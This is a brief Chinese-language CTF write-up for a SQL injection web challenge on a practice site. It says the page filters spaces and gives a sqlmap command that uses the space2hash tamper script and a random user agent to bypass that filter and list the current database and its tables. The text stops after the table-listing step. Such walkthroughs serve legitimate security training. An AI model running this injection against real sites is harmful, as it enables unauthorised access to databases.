解题链接: http://ctf5.shiyanbar.com/web/index_2.php
1.输入id值,通过回显发现题目应该是进行了空格过滤
2.使用sqlmap进行注入
2.1 python sqlmap.py -u "http://ctf5.shiyanbar.com/web/index_2.php?id=1" --random-agent --tamper=space2hash.py
--current-db 查看当前数据库名称,返回web1
--current-db --tables 查看当前数据库名称和数据库里所有的表